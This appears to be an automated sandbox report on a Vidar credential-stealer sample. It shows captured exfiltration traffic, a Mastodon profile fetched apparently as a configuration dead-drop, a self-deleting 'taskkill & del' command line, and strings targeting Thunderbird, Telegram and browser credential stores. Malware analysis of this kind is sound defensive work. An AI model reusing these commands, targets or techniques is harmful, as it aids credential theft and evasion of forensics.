Sep 27, 2021 18:33:17.157851934 CEST	3566	OUT	Data Raw: 25 1c 31 20 97 09 23 77 2b 02 52 16 10 e6 47 34 e8 88 70 b4 61 91 b8 33 f7 3f 0e 53 60 73 8f f8 c8 b5 81 5d 14 5b 6d bc 67 0e a7 51 ef 1b 69 f1 11 46 25 3b 5e ca 47 e7 0f f6 3d 26 37 fd 9a 1b 8a b7 e3 0b 78 b8 07 ed 33 39 03 d5 f4 56 8a ef 7a 00 Data Ascii: %1 #w+RG4pa3?S`s][mgQiF%;^G=&7x39Vz3$"j[{_>teF\f0Ci_iuLX?Xzn!q+K>/<9)r~o1M?olPm3yzBZ>
Sep 27, 2021 18:33:17.157879114 CEST	3574	OUT	Data Raw: 65 94 2b e4 7f 6b 11 b3 60 fd db e9 b7 79 44 04 ff 28 3b 45 3e 2f ea a2 60 ad 5c a1 1f 8b 39 87 37 70 b0 e4 b5 c2 ef 25 11 50 e2 77 31 43 0d 01 f8 c7 ae 92 2d 6d 5c 39 f6 ab 1f ff 40 69 c8 40 28 d1 13 41 44 c3 30 af 13 00 5d cb 8d 69 1e 14 d4 7e Data Ascii: e+k`yD(;E>/`\97p%Pw1C-m\9@i@(AD0]i~$GxXGW63HC\|-4ARZZGIbKF>kI@B5 uX\|Kr~\%-&bQXwPBA!k^1k6k6.moL0X
Sep 27, 2021 18:33:17.157892942 CEST	3580	OUT	Data Raw: 14 e7 81 d4 a1 05 c0 f2 27 35 20 75 a4 94 01 3c 40 a1 b0 8f 21 14 e3 93 96 a5 9c 4f 8f ea 37 80 e1 d5 ed d3 ff 3f b5 7d 79 3c 54 ef fb f7 41 28 8a 96 b1 86 c8 d2 4c 1a 2d 28 59 42 35 18 bb 91 25 44 a5 30 64 cf 9e 6c 69 99 ec bb 51 88 19 92 2d d9 Data Ascii: '5 u<@!O7?}y<TA(L-(YB5%D0dliQ-Cce-g\|?~_g}u}du&mDpLMm>>21\|T8 &rHx~z\|JBFFCe@G*aelWvy'K
Sep 27, 2021 18:33:17.157949924 CEST	3585	OUT	Data Raw: bc 67 48 e1 c1 3f 17 39 d8 5f 90 1f cf 26 0e 64 0d e9 22 97 c6 6b e8 6b c6 78 8e f8 3b 89 7e 2b 2f 5c 21 f5 94 7e 47 49 6b 76 ed 14 57 ae 2e 73 bf ad cc fd fd b7 3d ef 17 37 7a c9 6a 87 2f 7f 51 b8 66 74 4c cd 99 24 7b c1 61 ec 61 8d a6 32 e3 b6 Data Ascii: gH?9_&d"kkx;~+/\!~GIkvW.s=7zj/QftL${aa2zb#gm7T(PL\|a>nco=_gyj4$rXrcfq},;um5YM{~'4;%pP"o2[ig~f:]F7RvL
Sep 27, 2021 18:33:17.158000946 CEST	3588	OUT	Data Raw: d6 ab 91 63 ca 41 76 b6 e6 c5 15 89 94 d9 a3 ee 76 34 11 03 28 34 e2 e5 c9 ed e6 72 3b c5 a4 07 2b 39 39 2d 6b a1 1d ed 3b f2 e5 72 f8 4b b9 e1 32 98 ad 5a 83 e7 6d aa 5f ee a8 61 10 75 de 2d 26 27 82 b7 8e 78 65 4c eb 0f 09 2c ac f6 e6 77 a3 2f Data Ascii: cAvv4(4r;+99-k;rK2Zm_au-&'xeL,w/+s3Vwc3Q(g/6u-(}:UwEqbXlS1/4BM)}~cmlN4&s}~-Mfyr('c.S9)r\i4C}-$:,
Sep 27, 2021 18:33:17.362571955 CEST	3589	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16Gy0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49740	88.99.75.82	443	C:\Users\user\Desktop\T6zZFfRLqs.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-27 16:33:07 UTC	0	OUT	GET /@killern0 HTTP/1.1 Host: mas.to
2021-09-27 16:33:08 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 27 Sep 2021 16:33:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: Mastodon X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Permissions-Policy: interest-cohort=() Link: <https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to>; rel="lrdd"; type="application/jrd+json", <https://mas.to/users/killern0>; rel="alternate"; type="application/activity+json" Vary: Accept, Accept-Encoding, Origin Cache-Control: max-age=0, public ETag: W/"e73efba249baae2326e4e19544f6451b" Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://mas.to; img-src 'self' https: data: blob: https://mas.to; style-src 'self' https://mas.to 'nonce-qA4p2YJsld36ae3JZC7g3w=='; media-src 'self' https: data: https://mas.to; frame-src 'self' https:; manifest-src 'self' https://mas.to; connect-src 'self' data: blob: https://mas.to https://media.mas.to wss://mas.to; script-src 'self' https://mas.to; child-src 'self' blob: https://mas.to; worker-src 'self' blob: https://mas.to Set-Cookie: _mastodon_session=RIakeF43yB5z3DKgswfIwsUWuipKimb3U36IDPe3BnfqFVo5V%2B9JbHD7sCjas8o4uv%2FUZ01SoZeGnpGrhNIT7YlNqQgmsvtKXeBeS67xlevWKgMAL3hhCi1rys%2FAyZ1bhx8uw5Np%2FqqDrCJk%2FqHfHxLvfoZY7fWdird%2B8Lp8GVfMTwAuifqcVTrDGOCQ9sKHR0tDxAv6QjZ7OZKU%2Bi8wTI2X%2FrtE%2FPvG1Ebwkc1dcZdGw0senq2NpBe4WQ4CbHTZeld8UjjiuG%2FyFzDPmvz0tbmrP2dRr8r29PLXoYOlK5ptiGIQB%2BI6ry0UPC4xYqlnhFXeGqNpMEOAkRYGdZ9jIxheqzRy7i3tzYiYGHcDYqqItjR6SA%3D%3D--Zv8ToGmxUq3yG4sm--A%2Fz4zfpZIAawpeM%2BJ4VnYA%3D%3D; path=/; secure; HttpOnly; SameSite=Lax X-Request-Id: 5ca77ef3-9a25-46ab-b7a5-6919b1fd0707 X-Runtime: 0.052058 Strict-Transport-Security: max-age=63072000; includeSubDomains X-Cached: MISS Strict-Transport-Security: max-age=31536000
2021-09-27 16:33:08 UTC	1	IN	Data Raw: 35 30 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73 Data Ascii: 503a<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
2021-09-27 16:33:08 UTC	16	IN	Data Raw: 32 35 20 30 2d 31 37 2e 34 31 37 39 37 20 37 2e 35 30 38 35 31 36 2d 31 37 2e 34 31 37 39 37 20 32 32 2e 33 35 33 35 31 36 76 33 32 2e 33 37 35 30 30 32 48 39 36 2e 32 30 37 30 33 31 56 38 35 2e 34 32 33 38 32 38 63 30 2d 31 34 2e 38 34 35 2d 35 2e 38 31 35 34 36 38 2d 32 32 2e 33 35 33 35 31 35 2d 31 37 2e 34 31 37 39 36 39 2d 32 32 2e 33 35 33 35 31 36 2d 31 30 2e 34 39 33 37 35 20 30 2d 31 35 2e 37 34 30 32 33 34 20 36 2e 33 33 30 30 37 39 2d 31 35 2e 37 34 30 32 33 34 20 31 38 2e 37 39 38 38 32 39 76 35 39 2e 31 34 38 34 33 39 48 33 38 2e 39 30 34 32 39 37 56 38 30 2e 30 37 36 31 37 32 63 30 2d 31 32 2e 34 35 35 20 33 2e 31 37 31 30 31 36 2d 32 32 2e 33 35 31 33 32 38 20 39 2e 35 34 31 30 31 35 2d 32 39 2e 36 37 33 38 32 38 20 36 2e 35 36 38 37 35 31 Data Ascii: 25 0-17.41797 7.508516-17.41797 22.353516v32.375002H96.207031V85.423828c0-14.845-5.815468-22.353515-17.417969-22.353516-10.49375 0-15.740234 6.330079-15.740234 18.798829v59.148439H38.904297V80.076172c0-12.455 3.171016-22.351328 9.541015-29.673828 6.568751

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: T6zZFfRLqs.exe PID: 6576 Parent PID: 5356

General

Start time:	18:32:58
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\T6zZFfRLqs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\T6zZFfRLqs.exe'
Imagebase:	0x400000
File size:	599552 bytes
MD5 hash:	5D5E83E151A99BED97E13839E8881CB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6820 Parent PID: 6576

General

Start time:	18:33:19
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6828 Parent PID: 6820

General

Start time:	18:33:19
Start date:	27/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 6860 Parent PID: 6820

General

Start time:	18:33:19
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im T6zZFfRLqs.exe /f
Imagebase:	0xaa0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 6916 Parent PID: 6820

General

Start time:	18:33:20
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0x1000000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: T6zZFfRLqs.exe PID: 6576 Parent PID: 5356 T6zZFfRLqs.exeCOMMON

Executed Functions

Function 00496880, Relevance: 136.8, APIs: 55, Strings: 23, Instructions: 279libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(007ED0D0,00000000), ref: 0049688B
GetProcAddress.KERNEL32(00000000,007ED160), ref: 004968A5
GetProcAddress.KERNEL32(00000000,007ECFC8), ref: 004968B4
LoadLibraryA.KERNEL32(007ED208), ref: 004968C3
LoadLibraryA.KERNEL32(007ED1F0), ref: 004968D2
LoadLibraryA.KERNEL32(007ED268), ref: 004968E3
LoadLibraryA.KERNEL32(007ED3A0), ref: 004968F1
LoadLibraryA.KERNEL32(gdi32.dll), ref: 004968FE
LoadLibraryA.KERNEL32(ole32.dll), ref: 0049690B
LoadLibraryA.KERNEL32(user32.dll), ref: 0049691A
GetProcAddress.KERNEL32(00000000,007E8B80), ref: 00496930
GetProcAddress.KERNEL32(00000000,00763398), ref: 00496943
GetProcAddress.KERNEL32(00000000,007E86D0), ref: 00496955
GetProcAddress.KERNEL32(00000000,007635B8), ref: 00496968
GetProcAddress.KERNEL32(00000000,007E8E28), ref: 0049697B
GetProcAddress.KERNEL32(00000000,007ED178), ref: 0049698D
GetProcAddress.KERNEL32(?,007632B8), ref: 004969A8
GetProcAddress.KERNEL32(?,00763518), ref: 004969BB
GetProcAddress.KERNEL32(00000000,007ED298), ref: 004969D5
GetProcAddress.KERNEL32(00000000,00763218), ref: 004969E8
GetProcAddress.KERNEL32(00000000,007ECFE0), ref: 004969FB
GetProcAddress.KERNEL32(00000000,007ED2E0), ref: 00496A0D
GetProcAddress.KERNEL32(00000000,007ED388), ref: 00496A20
GetProcAddress.KERNEL32(00000000,007ED340), ref: 00496A33
GetProcAddress.KERNEL32(00000000,007ED358), ref: 00496A45
GetProcAddress.KERNEL32(00000000,007ED418), ref: 00496A58
GetProcAddress.KERNEL32(00000000,00763278), ref: 00496A6B
GetProcAddress.KERNEL32(00000000,00763298), ref: 00496A85
GetProcAddress.KERNEL32(00000000,00763358), ref: 00496A98
GetProcAddress.KERNEL32(00000000,007633D8), ref: 00496AAB
GetProcAddress.KERNEL32(00000000,00763418), ref: 00496ABD
GetProcAddress.KERNEL32(00000000,00763458), ref: 00496AD0
GetProcAddress.KERNEL32(00000000,007ED2F8), ref: 00496AE3
GetProcAddress.KERNEL32(00000000,007634B8), ref: 00496AF5
GetProcAddress.KERNEL32(00000000,007ED328), ref: 00496B08
GetProcAddress.KERNEL32(00000000,007ED9B0), ref: 00496B1B
GetProcAddress.KERNEL32(00000000,007ED8D0), ref: 00496B2D
GetProcAddress.KERNEL32(00000000,007EDCB0), ref: 00496B40
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00496B55
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 00496B66
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00496B77
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00496B88
GetProcAddress.KERNEL32(00000000,CreateDCA), ref: 00496B99
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 00496BAA
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00496BBB
GetProcAddress.KERNEL32(?,CoCreateInstance), ref: 00496BD6
GetProcAddress.KERNEL32(?,CoUninitialize), ref: 00496BE7
GetProcAddress.KERNEL32(?,GetDesktopWindow), ref: 00496C04
GetProcAddress.KERNEL32(?,ReleaseDC), ref: 00496C19
GetProcAddress.KERNEL32(?,GetKeyboardLayoutList), ref: 00496C2A
GetProcAddress.KERNEL32(?,CharToOemA), ref: 00496C3B
GetProcAddress.KERNEL32(?,GetDC), ref: 00496C4C
GetProcAddress.KERNEL32(?,wsprintfA), ref: 00496C5D
GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 00496C6E
GetProcAddress.KERNEL32(?,GetSystemMetrics), ref: 00496C7F

Strings

SelectObject, xrefs: 00496B5B
CreateCompatibleDC, xrefs: 00496BB0
x2v, xrefs: 00496A5E
GetDeviceCaps, xrefs: 00496B9F
gdi32.dll, xrefs: 004968F7
X4v, xrefs: 00496AC3
ReleaseDC, xrefs: 00496C0E
CoCreateInstance, xrefs: 00496BD0
CharToOemA, xrefs: 00496C30
X3v, xrefs: 00496A8B
CreateDCA, xrefs: 00496B8E
wsprintfA, xrefs: 00496C52
DeleteObject, xrefs: 00496B7D
GetSystemMetrics, xrefs: 00496C74
BitBlt, xrefs: 00496B6C
user32.dll, xrefs: 00496911
GetDesktopWindow, xrefs: 00496BFE
CoUninitialize, xrefs: 00496BDC
ole32.dll, xrefs: 00496904
EnumDisplayDevicesA, xrefs: 00496C63
GetKeyboardLayoutList, xrefs: 00496C1F
GetDC, xrefs: 00496C41
CreateCompatibleBitmap, xrefs: 00496B4F

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: BitBlt$CharToOemA$CoCreateInstance$CoUninitialize$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCA$DeleteObject$EnumDisplayDevicesA$GetDC$GetDesktopWindow$GetDeviceCaps$GetKeyboardLayoutList$GetSystemMetrics$ReleaseDC$SelectObject$X3v$X4v$gdi32.dll$ole32.dll$user32.dll$wsprintfA$x2v
API String ID: 2238633743-951751654
Opcode ID: 752388e8879909a42816c28012a607ceec3cdc4bb3599b94f0a9196bae0505bf
Instruction ID: 3b4c775fae62163c77419a6e99b8901aad04518a99974895bb2c5bf3183d9138
Opcode Fuzzy Hash: 752388e8879909a42816c28012a607ceec3cdc4bb3599b94f0a9196bae0505bf
Instruction Fuzzy Hash: 21B170B5A12200AFD7409FA5ED499667BFCEBCE712311453BF505E3260EBB499008F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80, Relevance: 67.4, APIs: 30, Strings: 8, Instructions: 921stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00405DF3
_memset.LIBCMT ref: 00405E06
_memset.LIBCMT ref: 00405E19
_memset.LIBCMT ref: 00405E2C
lstrcpyW.KERNEL32 ref: 00405E43
lstrcatW.KERNEL32(?,\*.*), ref: 00405E58
FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,2D794ED1), ref: 00405E6A
lstrcpyW.KERNEL32 ref: 00405E8D
lstrcatW.KERNEL32(?,004BB804), ref: 00405E9C
lstrcatW.KERNEL32(?,?), ref: 00405EAE
lstrcpyW.KERNEL32 ref: 00405EBD
lstrcatW.KERNEL32(?,004BB804), ref: 00405ECC
lstrcatW.KERNEL32(?,?), ref: 00405EDE
lstrcmpW.KERNEL32(?,004BB800), ref: 00405EFB
lstrcmpW.KERNEL32(?,004BB7F8), ref: 00405F16
PathMatchSpecW.SHLWAPI(?,00000000,?,?), ref: 00406057
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,2D794ED1), ref: 00406205
FindNextFileW.KERNELBASE(?,00000010,007ECC38,00000000,007ECC39,007ECC20,00000000,007ECC21,007EC708,00000000,007EC709,007ECBC0,00000000,007ECBC1,007EC7C8,00000000), ref: 004067D0
_memset.LIBCMT ref: 00406805
_memset.LIBCMT ref: 00406818
_memset.LIBCMT ref: 0040682B
_memset.LIBCMT ref: 0040683E
FindClose.KERNEL32(00000000), ref: 00406847
FindClose.KERNEL32(?), ref: 00406884
_memset.LIBCMT ref: 00406898
_memset.LIBCMT ref: 004068AB
_memset.LIBCMT ref: 004068BE
_memset.LIBCMT ref: 004068D1

Strings

P-~, xrefs: 0040626B
P0~, xrefs: 00406331
h0~, xrefs: 004063AB
0~, xrefs: 0040635B
H/~, xrefs: 0040623F
80~, xrefs: 0040630B
\*.*, xrefs: 00405E4B
x.v, xrefs: 004063FB

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$lstrcat$Find$Filelstrcpy$Closelstrcmp$DeleteFirstMatchNextPathSpec
String ID: 0~$80~$H/~$P-~$P0~$\*.*$h0~$x.v
API String ID: 3848687369-283830534
Opcode ID: 6cad5bc072cd729c1e8cc620c0ec3e83e7fad7e18ecc2f1e51177a7a20cde3b0
Instruction ID: 7b06f2fceb2252125254fc1a4124f666c6ba20ad71130c1cd262667204b1b2e7
Opcode Fuzzy Hash: 6cad5bc072cd729c1e8cc620c0ec3e83e7fad7e18ecc2f1e51177a7a20cde3b0
Instruction Fuzzy Hash: 2B7206B11043409FD724DF24CC44EABBBE9EF85354F044A2FF58A932A1DB349949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2B3, Relevance: 56.6, APIs: 10, Strings: 22, Instructions: 635COMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041F2B8
__wgetenv.LIBCMT ref: 0041F3CA

Part of subcall function 00404F50: _memmove.LIBCMT ref: 00404F8B

__wgetenv.LIBCMT ref: 0041F4F5

Part of subcall function 00403370: std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Strings

85v, xrefs: 0041F832
CryptoTab Browser, xrefs: 0041F920
x4v, xrefs: 0041F334
84v, xrefs: 0041F77B
Thunderbird, xrefs: 0041F99E
83v, xrefs: 0041F87E
key_datas, xrefs: 0041FA8F
P;~, xrefs: 0041F6A0
x3v, xrefs: 0041F78F
map*, xrefs: 0041FABB
8%~, xrefs: 0041F67C
*.txt, xrefs: 0041F37A, 0041F5A6
\Telegram Desktop\, xrefs: 0041FA58
X2v, xrefs: 0041F86F
X0v, xrefs: 0041F73E
D877F783D5D3EF8C*, xrefs: 0041FAA5
*.cookie, xrefs: 0041F495
\CryptoTab Browser\User Data\, xrefs: 0041F925
APPDATA, xrefs: 0041F2B3, 0041FA0F
\Thunderbird\Profiles\, xrefs: 0041F9A3
LOCALAPPDATA, xrefs: 0041F3C5, 0041F4F0
82v, xrefs: 0041F8D5

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wgetenv$Xinvalid_argument_memmovestd::_
String ID: *.cookie$*.txt$8%~$82v$83v$84v$85v$APPDATA$CryptoTab Browser$D877F783D5D3EF8C*$LOCALAPPDATA$P;~$Thunderbird$X0v$X2v$\CryptoTab Browser\User Data\$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*$x3v$x4v
API String ID: 1276473186-2723322836
Opcode ID: d0612efc65e0708066db695481a7885536529c7067f67cb2ee2de3bb0a3684d8
Instruction ID: a850e75b82a1deda930a36618c9c8f743ea22d7438283ce5cd403e82495a625c
Opcode Fuzzy Hash: d0612efc65e0708066db695481a7885536529c7067f67cb2ee2de3bb0a3684d8
Instruction Fuzzy Hash: 9432FAB1605340AFC704EF25DC919AB7BEAABC8704F00452FF44A473A1DB79D948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A730, Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 254libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(007ECA40), ref: 0041A75E
GetProcAddress.KERNEL32(00000000,007ECA88), ref: 0041A781
GetProcAddress.KERNEL32(00000000,007ECB30), ref: 0041A790
GetProcAddress.KERNEL32(00000000,00762EB8), ref: 0041A79E
GetProcAddress.KERNEL32(00000000,007ECAA0), ref: 0041A7AD
GetProcAddress.KERNEL32(00000000,007EC920), ref: 0041A7BC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A8CF
_fprintf.LIBCMT ref: 0041A8DC
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000018,000000FF,?,00000100,00000000,00000000), ref: 0041A8FE
_fprintf.LIBCMT ref: 0041A90E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A930
_fprintf.LIBCMT ref: 0041A940
_fprintf.LIBCMT ref: 0041A972
FreeLibrary.KERNEL32(00000000), ref: 0041AA1D

Strings

Soft: %s, xrefs: 0041A8D6
Password: %s, xrefs: 0041A9A4
Host: %s, xrefs: 0041A908
Login: %s, xrefs: 0041A93A
Password: , xrefs: 0041A96C
passwords.txt, xrefs: 0041A847

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
API String ID: 2724868727-3130916318
Opcode ID: 8aba8f26673e2174ece65196d2b077e3ac54928c0dbb36443b71c2d3ed3d9f09
Instruction ID: 23f77417df16c4eb790a0015b1ad9e47605991ff2ee3690580b371aaa372450c
Opcode Fuzzy Hash: 8aba8f26673e2174ece65196d2b077e3ac54928c0dbb36443b71c2d3ed3d9f09
Instruction Fuzzy Hash: BD81A3B1905304AFC710DFA5DC85DAFBBECEB89704F014A2FF54592281E774A984CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBF0, Relevance: 35.8, APIs: 18, Strings: 2, Instructions: 772COMMON

Download Yara Rule

APIs

Part of subcall function 00496670: FindFirstFileW.KERNEL32(00000000,?,?,?,2D794ED1), ref: 004966EC
Part of subcall function 00496670: FindNextFileW.KERNEL32(?,?), ref: 0049679B

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,2D794ED1), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

Part of subcall function 00415EA0: std::_Lockit::_Lockit.LIBCPMT ref: 00415EBC

Part of subcall function 004185F0: std::_Lockit::_Lockit.LIBCPMT ref: 0041861C
Part of subcall function 004185F0: std::_Lockit::_Lockit.LIBCPMT ref: 00418642

std::_Lockit::_Lockit.LIBCPMT ref: 0041DE91
_memmove.LIBCMT ref: 0041E05D
_fprintf.LIBCMT ref: 0041E0AA
_fprintf.LIBCMT ref: 0041E0B5
_fprintf.LIBCMT ref: 0041E0C0
_memmove.LIBCMT ref: 0041E130
_fprintf.LIBCMT ref: 0041E181
_fprintf.LIBCMT ref: 0041E18C
_fprintf.LIBCMT ref: 0041E1D4
_fprintf.LIBCMT ref: 0041E213
_fprintf.LIBCMT ref: 0041E22E
_fprintf.LIBCMT ref: 0041E239
_fprintf.LIBCMT ref: 0041E257
_fprintf.LIBCMT ref: 0041E262
_fprintf.LIBCMT ref: 0041E285
_fprintf.LIBCMT ref: 0041E290
std::_Lockit::_Lockit.LIBCPMT ref: 0041E50E
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041E593

Part of subcall function 0049B347: std::ios_base::_Tidy.LIBCPMT ref: 0049B368

Strings

FALSE, xrefs: 0041E0AF, 0041E186, 0041E20D
TK, xrefs: 0041E56A

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$LockitLockit::_std::_$ByteCharFileFindMultiWide_memmovestd::ios_base::_$FirstIos_base_dtorNextTidy
String ID: FALSE$TK
API String ID: 1373035807-3658482967
Opcode ID: 599436ea63115ce880228ae16bbfb53d94c066e9344344da74b222bd434eb523
Instruction ID: 62a3aa233642b21d3fcff5de88d84bf0d7ae202760ec1fb673875ef54a847a4e
Opcode Fuzzy Hash: 599436ea63115ce880228ae16bbfb53d94c066e9344344da74b222bd434eb523
Instruction Fuzzy Hash: 5C626AB1D00228DBDF20DF55C881BDEBBB5BF55704F1041AEE40967281EB786A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E780, Relevance: 30.4, APIs: 7, Strings: 10, Instructions: 692fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041E7C4
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0041E8B5
CopyFileW.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0041EA53
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0041EDD2
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0041EE03
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0041E8E6

Part of subcall function 00495AB0: WideCharToMultiByte.KERNEL32(00000000,00000000,0041DD3D,C4840000,00000000,00000000,00000000,00000000,0000000F,00000000,?,00000010,?,0041DD3D,?), ref: 00495ADF
Part of subcall function 00495AB0: WideCharToMultiByte.KERNEL32(00000000,00000000,0041DD3D,C4840000,00000000,00000000,00000000,00000000,000000FF,?,?), ref: 00495B06

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,2D794ED1), ref: 004962FB
